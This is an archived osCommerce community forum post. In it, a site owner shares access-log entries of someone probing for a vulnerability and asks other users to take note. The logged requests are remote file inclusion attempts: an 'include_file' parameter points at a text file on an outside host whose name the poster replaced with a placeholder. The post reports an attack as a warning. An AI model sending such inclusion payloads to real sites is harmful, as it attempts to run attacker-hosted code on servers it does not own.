Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Security Issue?


rocketman3291

Recommended Posts

Here's an excerpt from my access logs... It appears someone was fishing for a vulnerability. My site doesn't have this 'include_once.php' file, and I don't know what it would be used with/for, but I thought I should post this and let everyone see.

The domain 'someotherdomain' has been substituted for the actual domain name.

 

 

Host: 66.212.23.249

• /catalog/includes/include_once.php?include_file=http://someotherdomain.net/img/test.txt?

Http Code: 403 Date: Apr 20 15:52:21 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Win32)

 

 

• /includes/include_once.php?include_file=http://someotherdomain.net/img/test.txt?

Http Code: 404 Date: Apr 20 15:52:21 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Win32)

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...